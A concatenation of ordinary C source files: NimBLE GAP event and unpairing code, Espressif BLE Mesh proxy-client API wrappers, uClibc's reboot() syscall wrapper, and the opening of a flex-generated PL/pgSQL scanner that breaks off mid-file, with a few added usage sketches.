ble_hs_pvcy_remove_entry(peer_addr->type, peer_addr->val); return ble_store_util_delete_peer(peer_addr); } int ble_gap_unpair_oldest_peer(void) { ble_addr_t oldest_peer_id_addr; int num_peers; int rc; rc = ble_store_util_bonded_peers( &oldest_peer_id_addr, &num_peers, 1); if (rc != 0) { return rc; } if (num_peers == 0) { return BLE_HS_ENOENT; } rc = ble_gap_unpair(&oldest_peer_id_addr); if (rc != 0) { return rc; } return 0; } int ble_gap_unpair_oldest_except(const ble_addr_t *peer_addr) { ble_addr_t 
               peer_id_addrs[MYNEWT_VAL(BLE_STORE_MAX_BONDS)];
    int num_peers;
    int rc, i;

    rc = ble_store_util_bonded_peers(
            &peer_id_addrs[0], &num_peers, MYNEWT_VAL(BLE_STORE_MAX_BONDS));
    if (rc != 0) {
        return rc;
    }

    if (num_peers == 0) {
        return BLE_HS_ENOENT;
    }

    for (i = 0; i < num_peers; i++) {
        if (ble_addr_cmp(peer_addr, &peer_id_addrs[i]) != 0) {
            break;
        }
    }

    if (i >= num_peers) {
        return BLE_HS_ENOMEM;
    }

    return ble_gap_unpair(&peer_id_addrs[i]);
}

void
ble_gap_passkey_event(uint16_t conn_handle,
                      struct ble_gap_passkey_params *passkey_params)
{
#if NIMBLE_BLE_SM
    struct ble_gap_event event;

    BLE_HS_LOG(DEBUG, "send passkey action request %d\n",
               passkey_params->action);

    memset(&event, 0, sizeof event);
    event.type = BLE_GAP_EVENT_PASSKEY_ACTION;
    event.passkey.conn_handle = conn_handle;
    event.passkey.params = *passkey_params;
    ble_gap_call_conn_event_cb(&event, conn_handle);
#endif
}

void
ble_gap_enc_event(uint16_t conn_handle, int status,
                  int security_restored, int bonded)
{
#if NIMBLE_BLE_SM
    struct ble_gap_event event;

    memset(&event, 0, sizeof event);
    event.type = BLE_GAP_EVENT_ENC_CHANGE;
    event.enc_change.conn_handle = conn_handle;
    event.enc_change.status = status;

    ble_gap_event_listener_call(&event);
    ble_gap_call_conn_event_cb(&event, conn_handle);

    if (status != 0) {
        return;
    }

    /* If encryption succeeded and has been restored for a bonded device,
     * notify the GATT server so it has a chance to send a notification or
     * indication if needed.
     */
    if (security_restored) {
        ble_gatts_bonding_restored(conn_handle);
        return;
    }

    /* If this is a fresh pairing and bonding has been established, notify
     * the GATT server so that subscriptions made before bonding can be
     * stored.
     */
    if (bonded) {
        ble_gatts_bonding_established(conn_handle);
    }
#endif
}

void
ble_gap_identity_event(uint16_t conn_handle)
{
#if NIMBLE_BLE_SM
    struct ble_gap_event event;

    BLE_HS_LOG(DEBUG, "send identity changed\n");

    memset(&event, 0, sizeof event);
    event.type = BLE_GAP_EVENT_IDENTITY_RESOLVED;
    event.identity_resolved.conn_handle = conn_handle;
    ble_gap_call_conn_event_cb(&event, conn_handle);
#endif
}

int
ble_gap_repeat_pairing_event(const struct ble_gap_repeat_pairing *rp)
{
#if NIMBLE_BLE_SM
    struct ble_gap_event event;
    int rc;

    memset(&event, 0, sizeof event);
    event.type = BLE_GAP_EVENT_REPEAT_PAIRING;
    event.repeat_pairing = *rp;
    rc = ble_gap_call_conn_event_cb(&event, rp->conn_handle);
    return rc;
#else
    return 0;
#endif
}

/*****************************************************************************
 * $rssi                                                                     *
 *****************************************************************************/

int
ble_gap_conn_rssi(uint16_t conn_handle, int8_t *out_rssi)
{
    int rc;

    rc = ble_hs_hci_util_read_rssi(conn_handle, out_rssi);
    return rc;
}

/*****************************************************************************
 * $notify                                                                   *
 *****************************************************************************/

void
ble_gap_notify_rx_event(uint16_t conn_handle, uint16_t attr_handle,
                        struct os_mbuf *om, int is_indication)
{
#if !MYNEWT_VAL(BLE_GATT_NOTIFY) && !MYNEWT_VAL(BLE_GATT_INDICATE)
    return;
#endif

    struct ble_gap_event event;

    memset(&event, 0, sizeof event);
    event.type = BLE_GAP_EVENT_NOTIFY_RX;
    event.notify_rx.conn_handle = conn_handle;
    event.notify_rx.attr_handle = attr_handle;
    event.notify_rx.om = om;
    event.notify_rx.indication = is_indication;
    ble_gap_event_listener_call(&event);
    ble_gap_call_conn_event_cb(&event, conn_handle);

    os_mbuf_free_chain(event.notify_rx.om);
}

void
ble_gap_notify_tx_event(int status, uint16_t conn_handle, uint16_t attr_handle,
                        int
is_indication) { #if MYNEWT_VAL(BLE_GATT_NOTIFY) || MYNEWT_VAL(BLE_GATT_INDICATE) struct ble_gap_event event; memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_NOTIFY_TX; event.notify_tx.conn_handle = conn_handle; event.notify_tx.status = status; event.notify_tx.attr_handle = attr_handle; event.notify_tx.indication = is_indication; ble_gap_event_listener_call(&event); ble_gap_call_conn_event_cb(&event, conn_handle); #endif } /***************************************************************************** * $subscribe * *****************************************************************************/ void ble_gap_subscribe_event(uint16_t conn_handle, uint16_t attr_handle, uint8_t reason, uint8_t prev_notify, uint8_t cur_notify, uint8_t prev_indicate, uint8_t cur_indicate) { struct ble_gap_event event; BLE_HS_DBG_ASSERT(prev_notify != cur_notify || prev_indicate != cur_indicate); BLE_HS_DBG_ASSERT(reason == BLE_GAP_SUBSCRIBE_REASON_WRITE || reason == BLE_GAP_SUBSCRIBE_REASON_TERM || reason == BLE_GAP_SUBSCRIBE_REASON_RESTORE); memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_SUBSCRIBE; event.subscribe.conn_handle = conn_handle; event.subscribe.attr_handle = attr_handle; event.subscribe.reason = reason; event.subscribe.prev_notify = !!prev_notify; event.subscribe.cur_notify = !!cur_notify; event.subscribe.prev_indicate = !!prev_indicate; event.subscribe.cur_indicate = !!cur_indicate; ble_gap_event_listener_call(&event); ble_gap_call_conn_event_cb(&event, conn_handle); } /***************************************************************************** * $mtu * *****************************************************************************/ void ble_gap_mtu_event(uint16_t conn_handle, uint16_t cid, uint16_t mtu) { struct ble_gap_event event; memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_MTU; event.mtu.conn_handle = conn_handle; event.mtu.channel_id = cid; event.mtu.value = mtu; ble_gap_event_listener_call(&event); ble_gap_call_conn_event_cb(&event, conn_handle); } /***************************************************************************** * $preempt * *****************************************************************************/ void ble_gap_preempt_no_lock(void) { int rc; int i; (void)rc; (void)i; #if NIMBLE_BLE_ADVERTISE #if MYNEWT_VAL(BLE_EXT_ADV) for (i = 0; i < BLE_ADV_INSTANCES; i++) { rc = ble_gap_ext_adv_stop_no_lock(i); if (rc == 0) { ble_gap_slave[i].preempted = 1; } } #else rc = ble_gap_adv_stop_no_lock(); if (rc == 0) { ble_gap_slave[0].preempted = 1; } #endif #endif #if NIMBLE_BLE_CONNECT rc = ble_gap_conn_cancel_no_lock(); if (rc == 0) { ble_gap_master.preempted_op = BLE_GAP_OP_M_CONN; } #endif #if NIMBLE_BLE_SCAN rc = ble_gap_disc_cancel_no_lock(); if (rc == 0) { ble_gap_master.preempted_op = BLE_GAP_OP_M_DISC; } #endif } /** * @brief Preempts the GAP if it is not already preempted. * * Aborts all active GAP procedures and prevents new ones from being started. * This function is used to ensure an idle GAP so that the controller's * resolving list can be modified. When done accessing the resolving list, the * caller must call `ble_gap_preempt_done()` to permit new GAP procedures. * * On preemption, all aborted GAP procedures are reported with a status or * reason code of BLE_HS_EPREEMPTED. An attempt to initiate a new GAP * procedure during preemption fails with a return code of BLE_HS_EPREEMPTED. 
 */
void
ble_gap_preempt(void)
{
    ble_hs_lock();

    if (!ble_gap_is_preempted()) {
        ble_gap_preempt_no_lock();
    }

    ble_hs_unlock();
}

/**
 * Takes GAP out of the preempted state, allowing new GAP procedures to be
 * initiated. This function should only be called after a call to
 * `ble_gap_preempt()`.
 */

static struct ble_npl_mutex preempt_done_mutex;

void
ble_gap_preempt_done(void)
{
    struct ble_gap_event event;
    ble_gap_event_fn *master_cb;
    void *master_arg;
    int disc_preempted;
    int i;
    static struct {
        ble_gap_event_fn *cb;
        void *arg;
    } slaves[BLE_ADV_INSTANCES];

    disc_preempted = 0;

    /* Protects the static slaves array from concurrent access by multiple
     * threads. */
    ble_npl_mutex_pend(&preempt_done_mutex, 0xFFFFFFFF);

    memset(slaves, 0, sizeof(slaves));

    ble_hs_lock();

    for (i = 0; i < BLE_ADV_INSTANCES; i++) {
        if (ble_gap_slave[i].preempted) {
            ble_gap_slave[i].preempted = 0;
            slaves[i].cb = ble_gap_slave[i].cb;
            slaves[i].arg = ble_gap_slave[i].cb_arg;
        }
    }

    if (ble_gap_master.preempted_op == BLE_GAP_OP_M_DISC) {
        ble_gap_master.preempted_op = BLE_GAP_OP_NULL;
        disc_preempted = 1;
        master_cb = ble_gap_master.cb;
        master_arg = ble_gap_master.cb_arg;
    }

    ble_hs_unlock();

    event.type = BLE_GAP_EVENT_ADV_COMPLETE;
    event.adv_complete.reason = BLE_HS_EPREEMPTED;

    for (i = 0; i < BLE_ADV_INSTANCES; i++) {
        if (slaves[i].cb) {
#if MYNEWT_VAL(BLE_EXT_ADV)
            event.adv_complete.instance = i;
            event.adv_complete.conn_handle = i;
#endif
            ble_gap_call_event_cb(&event, slaves[i].cb, slaves[i].arg);
        }
    }

    ble_npl_mutex_release(&preempt_done_mutex);

    if (disc_preempted) {
        event.type = BLE_GAP_EVENT_DISC_COMPLETE;
        event.disc_complete.reason = BLE_HS_EPREEMPTED;
        ble_gap_call_event_cb(&event, master_cb, master_arg);
    }
}

int
ble_gap_event_listener_register(struct ble_gap_event_listener *listener,
                                ble_gap_event_fn *fn, void *arg)
{
    struct ble_gap_event_listener *evl = NULL;
    int rc;

    SLIST_FOREACH(evl, &ble_gap_event_listener_list, link) {
        if (evl == listener) {
            break;
        }
    }

    if (!evl) {
        if (fn) {
            memset(listener, 0, sizeof(*listener));
            listener->fn = fn;
            listener->arg = arg;
            SLIST_INSERT_HEAD(&ble_gap_event_listener_list, listener, link);
            rc = 0;
        } else {
            rc = BLE_HS_EINVAL;
        }
    } else {
        rc = BLE_HS_EALREADY;
    }

    return rc;
}

int
ble_gap_event_listener_unregister(struct ble_gap_event_listener *listener)
{
    struct ble_gap_event_listener *evl = NULL;
    int rc;

    /*
     * We check whether the element exists on the list only as a sanity
     * check, to let the caller know whether it had registered its listener
     * before.
*/ SLIST_FOREACH(evl, &ble_gap_event_listener_list, link) { if (evl == listener) { break; } } if (!evl) { rc = BLE_HS_ENOENT; } else { SLIST_REMOVE(&ble_gap_event_listener_list, listener, ble_gap_event_listener, link); rc = 0; } return rc; } static int ble_gap_event_listener_call(struct ble_gap_event *event) { struct ble_gap_event_listener *evl = NULL; SLIST_FOREACH(evl, &ble_gap_event_listener_list, link) { evl->fn(event, evl->arg); } return 0; } /***************************************************************************** * $init * *****************************************************************************/ int ble_gap_init(void) { int rc; memset(&ble_gap_master, 0, sizeof(ble_gap_master)); memset(ble_gap_slave, 0, sizeof(ble_gap_slave)); #if MYNEWT_VAL(BLE_PERIODIC_ADV) memset(&ble_gap_sync, 0, sizeof(ble_gap_sync)); #endif ble_npl_mutex_init(&preempt_done_mutex); SLIST_INIT(&ble_gap_update_entries); SLIST_INIT(&ble_gap_event_listener_list); rc = os_mempool_init(&ble_gap_update_entry_pool, MYNEWT_VAL(BLE_GAP_MAX_PENDING_CONN_PARAM_UPDATE), sizeof (struct ble_gap_update_entry), ble_gap_update_entry_mem, "ble_gap_update"); switch (rc) { case 0: break; case OS_ENOMEM: rc = BLE_HS_ENOMEM; goto err; default: rc = BLE_HS_EOS; goto err; } rc = stats_init_and_reg( STATS_HDR(ble_gap_stats), STATS_SIZE_INIT_PARMS(ble_gap_stats, STATS_SIZE_32), STATS_NAME_INIT_PARMS(ble_gap_stats), "ble_gap"); if (rc != 0) { goto err; } return 0; err: return rc; }
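/*
 * Illustrative usage sketch (added commentary, not part of the original
 * ble_gap.c): how an application typically drives the connect API above.
 * The function names below are hypothetical and error handling is minimal;
 * a NULL conn_params argument selects ble_gap_conn_params_dflt, and the
 * 10000 ms duration bounds the procedure, after which the attempt is
 * cancelled and the failure is delivered through the callback.
 */
static int
example_gap_event_cb(struct ble_gap_event *event, void *arg)
{
    switch (event->type) {
    case BLE_GAP_EVENT_CONNECT:
        /* event->connect.status == 0 means the connection was established;
         * nonzero means the attempt failed or timed out. On success the
         * connection inherits this callback for all later events. */
        return 0;

    case BLE_GAP_EVENT_DISCONNECT:
        return 0;

    default:
        return 0;
    }
}

static int
example_connect(const ble_addr_t *peer)
{
    /* Initiation is synchronous; the outcome arrives asynchronously via
     * the callback registered here. */
    return ble_gap_connect(BLE_OWN_ADDR_PUBLIC, peer, 10000, NULL,
                           example_gap_event_cb, NULL);
}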
185568.c
// Copyright 2017-2019 Espressif Systems (Shanghai) PTE LTD // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. #include <stdint.h> #include <string.h> #include "esp_err.h" #include "btc_ble_mesh_prov.h" #include "esp_ble_mesh_defs.h" esp_err_t esp_ble_mesh_proxy_identity_enable(void) { btc_msg_t msg = {0}; ESP_BLE_HOST_STATUS_CHECK(ESP_BLE_HOST_STATUS_ENABLED); msg.sig = BTC_SIG_API_CALL; msg.pid = BTC_PID_PROV; msg.act = BTC_BLE_MESH_ACT_PROXY_IDENTITY_ENABLE; return (btc_transfer_context(&msg, NULL, 0, NULL) == BT_STATUS_SUCCESS ? ESP_OK : ESP_FAIL); } esp_err_t esp_ble_mesh_proxy_gatt_enable(void) { btc_msg_t msg = {0}; ESP_BLE_HOST_STATUS_CHECK(ESP_BLE_HOST_STATUS_ENABLED); msg.sig = BTC_SIG_API_CALL; msg.pid = BTC_PID_PROV; msg.act = BTC_BLE_MESH_ACT_PROXY_GATT_ENABLE; return (btc_transfer_context(&msg, NULL, 0, NULL) == BT_STATUS_SUCCESS ? ESP_OK : ESP_FAIL); } esp_err_t esp_ble_mesh_proxy_gatt_disable(void) { btc_msg_t msg = {0}; ESP_BLE_HOST_STATUS_CHECK(ESP_BLE_HOST_STATUS_ENABLED); msg.sig = BTC_SIG_API_CALL; msg.pid = BTC_PID_PROV; msg.act = BTC_BLE_MESH_ACT_PROXY_GATT_DISABLE; return (btc_transfer_context(&msg, NULL, 0, NULL) == BT_STATUS_SUCCESS ? ESP_OK : ESP_FAIL); } esp_err_t esp_ble_mesh_proxy_client_connect(esp_ble_mesh_bd_addr_t addr, esp_ble_mesh_addr_type_t addr_type, uint16_t net_idx) { btc_ble_mesh_prov_args_t arg = {0}; btc_msg_t msg = {0}; if (!addr || addr_type > ESP_BLE_MESH_ADDR_TYPE_RANDOM) { return ESP_ERR_INVALID_ARG; } ESP_BLE_HOST_STATUS_CHECK(ESP_BLE_HOST_STATUS_ENABLED); msg.sig = BTC_SIG_API_CALL; msg.pid = BTC_PID_PROV; msg.act = BTC_BLE_MESH_ACT_PROXY_CLIENT_CONNECT; memcpy(arg.proxy_client_connect.addr, addr, BD_ADDR_LEN); arg.proxy_client_connect.addr_type = addr_type; arg.proxy_client_connect.net_idx = net_idx; return (btc_transfer_context(&msg, &arg, sizeof(btc_ble_mesh_prov_args_t), NULL) == BT_STATUS_SUCCESS ? ESP_OK : ESP_FAIL); } esp_err_t esp_ble_mesh_proxy_client_disconnect(uint8_t conn_handle) { btc_ble_mesh_prov_args_t arg = {0}; btc_msg_t msg = {0}; ESP_BLE_HOST_STATUS_CHECK(ESP_BLE_HOST_STATUS_ENABLED); msg.sig = BTC_SIG_API_CALL; msg.pid = BTC_PID_PROV; msg.act = BTC_BLE_MESH_ACT_PROXY_CLIENT_DISCONNECT; arg.proxy_client_disconnect.conn_handle = conn_handle; return (btc_transfer_context(&msg, &arg, sizeof(btc_ble_mesh_prov_args_t), NULL) == BT_STATUS_SUCCESS ? 
ESP_OK : ESP_FAIL); } esp_err_t esp_ble_mesh_proxy_client_set_filter_type(uint8_t conn_handle, uint16_t net_idx, esp_ble_mesh_proxy_filter_type_t filter_type) { btc_ble_mesh_prov_args_t arg = {0}; btc_msg_t msg = {0}; if (filter_type > PROXY_FILTER_BLACKLIST) { return ESP_ERR_INVALID_ARG; } ESP_BLE_HOST_STATUS_CHECK(ESP_BLE_HOST_STATUS_ENABLED); msg.sig = BTC_SIG_API_CALL; msg.pid = BTC_PID_PROV; msg.act = BTC_BLE_MESH_ACT_PROXY_CLIENT_SET_FILTER_TYPE; arg.proxy_client_set_filter_type.conn_handle = conn_handle; arg.proxy_client_set_filter_type.net_idx = net_idx; arg.proxy_client_set_filter_type.filter_type = filter_type; return (btc_transfer_context(&msg, &arg, sizeof(btc_ble_mesh_prov_args_t), NULL) == BT_STATUS_SUCCESS ? ESP_OK : ESP_FAIL); } esp_err_t esp_ble_mesh_proxy_client_add_filter_addr(uint8_t conn_handle, uint16_t net_idx, uint16_t *addr, uint16_t addr_num) { btc_ble_mesh_prov_args_t arg = {0}; btc_msg_t msg = {0}; if (!addr || addr_num == 0) { return ESP_ERR_INVALID_ARG; } ESP_BLE_HOST_STATUS_CHECK(ESP_BLE_HOST_STATUS_ENABLED); msg.sig = BTC_SIG_API_CALL; msg.pid = BTC_PID_PROV; msg.act = BTC_BLE_MESH_ACT_PROXY_CLIENT_ADD_FILTER_ADDR; arg.proxy_client_add_filter_addr.conn_handle = conn_handle; arg.proxy_client_add_filter_addr.net_idx = net_idx; arg.proxy_client_add_filter_addr.addr_num = addr_num; arg.proxy_client_add_filter_addr.addr = addr; return (btc_transfer_context(&msg, &arg, sizeof(btc_ble_mesh_prov_args_t), btc_ble_mesh_prov_arg_deep_copy) == BT_STATUS_SUCCESS ? ESP_OK : ESP_FAIL); } esp_err_t esp_ble_mesh_proxy_client_remove_filter_addr(uint8_t conn_handle, uint16_t net_idx, uint16_t *addr, uint16_t addr_num) { btc_ble_mesh_prov_args_t arg = {0}; btc_msg_t msg = {0}; if (!addr || addr_num == 0) { return ESP_ERR_INVALID_ARG; } ESP_BLE_HOST_STATUS_CHECK(ESP_BLE_HOST_STATUS_ENABLED); msg.sig = BTC_SIG_API_CALL; msg.pid = BTC_PID_PROV; msg.act = BTC_BLE_MESH_ACT_PROXY_CLIENT_REMOVE_FILTER_ADDR; arg.proxy_client_remove_filter_addr.conn_handle = conn_handle; arg.proxy_client_remove_filter_addr.net_idx = net_idx; arg.proxy_client_remove_filter_addr.addr_num = addr_num; arg.proxy_client_remove_filter_addr.addr = addr; return (btc_transfer_context(&msg, &arg, sizeof(btc_ble_mesh_prov_args_t), btc_ble_mesh_prov_arg_deep_copy) == BT_STATUS_SUCCESS ? ESP_OK : ESP_FAIL); }
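/*
 * Illustrative usage sketch (added commentary, not part of the original
 * file): a typical proxy-client sequence built from the wrappers above.
 * The function names, addresses and net_idx value are hypothetical;
 * PROXY_FILTER_WHITELIST is the counterpart of the PROXY_FILTER_BLACKLIST
 * constant checked above, and the connection handle would normally be
 * taken from the proxy-client "connected" callback event rather than
 * passed in directly.
 */
static esp_err_t
example_proxy_connect(esp_ble_mesh_bd_addr_t addr)
{
    /* The result is delivered asynchronously through the provisioning
     * callback; only the request is queued here. */
    return esp_ble_mesh_proxy_client_connect(addr,
                                             ESP_BLE_MESH_ADDR_TYPE_PUBLIC,
                                             0x0000 /* net_idx */);
}

static esp_err_t
example_proxy_set_whitelist(uint8_t conn_handle)
{
    uint16_t filter_addrs[] = { 0x0001, 0xC000 };   /* example addresses */
    esp_err_t err;

    /* With a whitelist filter, the proxy server forwards only packets
     * destined to the listed addresses. */
    err = esp_ble_mesh_proxy_client_set_filter_type(conn_handle, 0x0000,
                                                    PROXY_FILTER_WHITELIST);
    if (err != ESP_OK) {
        return err;
    }

    return esp_ble_mesh_proxy_client_add_filter_addr(conn_handle, 0x0000,
                                                     filter_addrs, 2);
}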
763750.c
/* vi: set sw=4 ts=4: */ /* * _reboot() for uClibc * * Copyright (C) 2000-2006 Erik Andersen <andersen@uclibc.org> * * Licensed under the LGPL v2.1, see the file COPYING.LIB in this tarball. */ #include <sys/syscall.h> #include <sys/reboot.h> #define __NR__reboot __NR_reboot static __inline__ _syscall3(int, _reboot, int, magic, int, magic2, int, flag) int reboot(int flag) { return (_reboot((int) 0xfee1dead, 672274793, flag)); }
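/*
 * Illustrative note (added commentary, not part of the original file):
 * the constants passed to the raw syscall are the kernel's reboot magic
 * numbers: 0xfee1dead is LINUX_REBOOT_MAGIC1, and 672274793 equals
 * 0x28121969 (LINUX_REBOOT_MAGIC2, Linus Torvalds' date of birth). A
 * privileged caller (CAP_SYS_BOOT) could restart the machine as sketched
 * below; the block is guarded with "#if 0" because the call really
 * reboots the system.
 */
#if 0
#include <sys/reboot.h>

int restart_machine(void)
{
	/* RB_AUTOBOOT maps to LINUX_REBOOT_CMD_RESTART on Linux. */
	return reboot(RB_AUTOBOOT);
}
#endif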
744016.c
#line 2 "pl_scan.c" #line 4 "pl_scan.c" #define YY_INT_ALIGNED short int /* A lexical scanner generated by flex */ #define yy_create_buffer plpgsql_base_yy_create_buffer #define yy_delete_buffer plpgsql_base_yy_delete_buffer #define yy_flex_debug plpgsql_base_yy_flex_debug #define yy_init_buffer plpgsql_base_yy_init_buffer #define yy_flush_buffer plpgsql_base_yy_flush_buffer #define yy_load_buffer_state plpgsql_base_yy_load_buffer_state #define yy_switch_to_buffer plpgsql_base_yy_switch_to_buffer #define yyin plpgsql_base_yyin #define yyleng plpgsql_base_yyleng #define yylex plpgsql_base_yylex #define yylineno plpgsql_base_yylineno #define yyout plpgsql_base_yyout #define yyrestart plpgsql_base_yyrestart #define yytext plpgsql_base_yytext #define yywrap plpgsql_base_yywrap #define yyalloc plpgsql_base_yyalloc #define yyrealloc plpgsql_base_yyrealloc #define yyfree plpgsql_base_yyfree #define FLEX_SCANNER #define YY_FLEX_MAJOR_VERSION 2 #define YY_FLEX_MINOR_VERSION 5 #define YY_FLEX_SUBMINOR_VERSION 35 #if YY_FLEX_SUBMINOR_VERSION > 0 #define FLEX_BETA #endif /* First, we deal with platform-specific or compiler-specific issues. */ /* begin standard C headers. */ #include <stdio.h> #include <string.h> #include <errno.h> #include <stdlib.h> /* end standard C headers. */ /* flex integer type definitions */ #ifndef FLEXINT_H #define FLEXINT_H /* C99 systems have <inttypes.h>. Non-C99 systems may or may not. */ #if defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L /* C99 says to define __STDC_LIMIT_MACROS before including stdint.h, * if you want the limit (max/min) macros for int types. */ #ifndef __STDC_LIMIT_MACROS #define __STDC_LIMIT_MACROS 1 #endif #include <inttypes.h> typedef int8_t flex_int8_t; typedef uint8_t flex_uint8_t; typedef int16_t flex_int16_t; typedef uint16_t flex_uint16_t; typedef int32_t flex_int32_t; typedef uint32_t flex_uint32_t; #else typedef signed char flex_int8_t; typedef short int flex_int16_t; typedef int flex_int32_t; typedef unsigned char flex_uint8_t; typedef unsigned short int flex_uint16_t; typedef unsigned int flex_uint32_t; #endif /* ! C99 */ /* Limits of integral types. */ #ifndef INT8_MIN #define INT8_MIN (-128) #endif #ifndef INT16_MIN #define INT16_MIN (-32767-1) #endif #ifndef INT32_MIN #define INT32_MIN (-2147483647-1) #endif #ifndef INT8_MAX #define INT8_MAX (127) #endif #ifndef INT16_MAX #define INT16_MAX (32767) #endif #ifndef INT32_MAX #define INT32_MAX (2147483647) #endif #ifndef UINT8_MAX #define UINT8_MAX (255U) #endif #ifndef UINT16_MAX #define UINT16_MAX (65535U) #endif #ifndef UINT32_MAX #define UINT32_MAX (4294967295U) #endif #endif /* ! FLEXINT_H */ #ifdef __cplusplus /* The "const" storage-class-modifier is valid. */ #define YY_USE_CONST #else /* ! __cplusplus */ /* C99 requires __STDC__ to be defined as 1. */ #if defined (__STDC__) #define YY_USE_CONST #endif /* defined (__STDC__) */ #endif /* ! __cplusplus */ #ifdef YY_USE_CONST #define yyconst const #else #define yyconst #endif /* Returned upon end-of-file. */ #define YY_NULL 0 /* Promotes a possibly negative, possibly signed char to an unsigned * integer for use as an array index. If the signed char is negative, * we want to instead treat it as an 8-bit unsigned char, hence the * double cast. */ #define YY_SC_TO_UI(c) ((unsigned int) (unsigned char) c) /* Enter a start condition. This macro really ought to take a parameter, * but we do it the disgusting crufty way forced on us by the ()-less * definition of BEGIN. 
*/ #define BEGIN (yy_start) = 1 + 2 * /* Translate the current start state into a value that can be later handed * to BEGIN to return to the state. The YYSTATE alias is for lex * compatibility. */ #define YY_START (((yy_start) - 1) / 2) #define YYSTATE YY_START /* Action number for EOF rule of a given start state. */ #define YY_STATE_EOF(state) (YY_END_OF_BUFFER + state + 1) /* Special action meaning "start processing a new file". */ #define YY_NEW_FILE plpgsql_base_yyrestart(plpgsql_base_yyin ) #define YY_END_OF_BUFFER_CHAR 0 /* Size of default input buffer. */ #ifndef YY_BUF_SIZE #define YY_BUF_SIZE 16384 #endif /* The state buf must be large enough to hold one state per character in the main buffer. */ #define YY_STATE_BUF_SIZE ((YY_BUF_SIZE + 2) * sizeof(yy_state_type)) #ifndef YY_TYPEDEF_YY_BUFFER_STATE #define YY_TYPEDEF_YY_BUFFER_STATE typedef struct yy_buffer_state *YY_BUFFER_STATE; #endif extern int plpgsql_base_yyleng; extern FILE *plpgsql_base_yyin, *plpgsql_base_yyout; #define EOB_ACT_CONTINUE_SCAN 0 #define EOB_ACT_END_OF_FILE 1 #define EOB_ACT_LAST_MATCH 2 #define YY_LESS_LINENO(n) /* Return all but the first "n" matched characters back to the input stream. */ #define yyless(n) \ do \ { \ /* Undo effects of setting up plpgsql_base_yytext. */ \ int yyless_macro_arg = (n); \ YY_LESS_LINENO(yyless_macro_arg);\ *yy_cp = (yy_hold_char); \ YY_RESTORE_YY_MORE_OFFSET \ (yy_c_buf_p) = yy_cp = yy_bp + yyless_macro_arg - YY_MORE_ADJ; \ YY_DO_BEFORE_ACTION; /* set up plpgsql_base_yytext again */ \ } \ while ( 0 ) #define unput(c) yyunput( c, (yytext_ptr) ) #ifndef YY_TYPEDEF_YY_SIZE_T #define YY_TYPEDEF_YY_SIZE_T typedef size_t yy_size_t; #endif #ifndef YY_STRUCT_YY_BUFFER_STATE #define YY_STRUCT_YY_BUFFER_STATE struct yy_buffer_state { FILE *yy_input_file; char *yy_ch_buf; /* input buffer */ char *yy_buf_pos; /* current position in input buffer */ /* Size of input buffer in bytes, not including room for EOB * characters. */ yy_size_t yy_buf_size; /* Number of characters read into yy_ch_buf, not including EOB * characters. */ int yy_n_chars; /* Whether we "own" the buffer - i.e., we know we created it, * and can realloc() it to grow it, and should free() it to * delete it. */ int yy_is_our_buffer; /* Whether this is an "interactive" input source; if so, and * if we're using stdio for input, then we want to use getc() * instead of fread(), to make sure we stop fetching input after * each newline. */ int yy_is_interactive; /* Whether we're considered to be at the beginning of a line. * If so, '^' rules will be active on the next match, otherwise * not. */ int yy_at_bol; int yy_bs_lineno; /**< The line count. */ int yy_bs_column; /**< The column count. */ /* Whether to try to fill the input buffer when we reach the * end of it. */ int yy_fill_buffer; int yy_buffer_status; #define YY_BUFFER_NEW 0 #define YY_BUFFER_NORMAL 1 /* When an EOF's been seen but there's still some text to process * then we mark the buffer as YY_EOF_PENDING, to indicate that we * shouldn't try reading from the input source any more. We might * still have a bunch of tokens to match, though, because of * possible backing-up. * * When we actually see the EOF, we change the status to "new" * (via plpgsql_base_yyrestart()), so that the user can continue scanning by * just pointing plpgsql_base_yyin at a new input file. */ #define YY_BUFFER_EOF_PENDING 2 }; #endif /* !YY_STRUCT_YY_BUFFER_STATE */ /* Stack of input buffers. */ static size_t yy_buffer_stack_top = 0; /**< index of top of stack. 
*/ static size_t yy_buffer_stack_max = 0; /**< capacity of stack. */ static YY_BUFFER_STATE * yy_buffer_stack = 0; /**< Stack as an array. */ /* We provide macros for accessing buffer states in case in the * future we want to put the buffer states in a more general * "scanner state". * * Returns the top of the stack, or NULL. */ #define YY_CURRENT_BUFFER ( (yy_buffer_stack) \ ? (yy_buffer_stack)[(yy_buffer_stack_top)] \ : NULL) /* Same as previous macro, but useful when we know that the buffer stack is not * NULL or when we need an lvalue. For internal use only. */ #define YY_CURRENT_BUFFER_LVALUE (yy_buffer_stack)[(yy_buffer_stack_top)] /* yy_hold_char holds the character lost when plpgsql_base_yytext is formed. */ static char yy_hold_char; static int yy_n_chars; /* number of characters read into yy_ch_buf */ int plpgsql_base_yyleng; /* Points to current character in buffer. */ static char *yy_c_buf_p = (char *) 0; static int yy_init = 0; /* whether we need to initialize */ static int yy_start = 0; /* start state number */ /* Flag which is used to allow plpgsql_base_yywrap()'s to do buffer switches * instead of setting up a fresh plpgsql_base_yyin. A bit of a hack ... */ static int yy_did_buffer_switch_on_eof; void plpgsql_base_yyrestart (FILE *input_file ); void plpgsql_base_yy_switch_to_buffer (YY_BUFFER_STATE new_buffer ); YY_BUFFER_STATE plpgsql_base_yy_create_buffer (FILE *file,int size ); void plpgsql_base_yy_delete_buffer (YY_BUFFER_STATE b ); void plpgsql_base_yy_flush_buffer (YY_BUFFER_STATE b ); void plpgsql_base_yypush_buffer_state (YY_BUFFER_STATE new_buffer ); void plpgsql_base_yypop_buffer_state (void ); static void plpgsql_base_yyensure_buffer_stack (void ); static void plpgsql_base_yy_load_buffer_state (void ); static void plpgsql_base_yy_init_buffer (YY_BUFFER_STATE b,FILE *file ); #define YY_FLUSH_BUFFER plpgsql_base_yy_flush_buffer(YY_CURRENT_BUFFER ) YY_BUFFER_STATE plpgsql_base_yy_scan_buffer (char *base,yy_size_t size ); YY_BUFFER_STATE plpgsql_base_yy_scan_string (yyconst char *yy_str ); YY_BUFFER_STATE plpgsql_base_yy_scan_bytes (yyconst char *bytes,int len ); void *plpgsql_base_yyalloc (yy_size_t 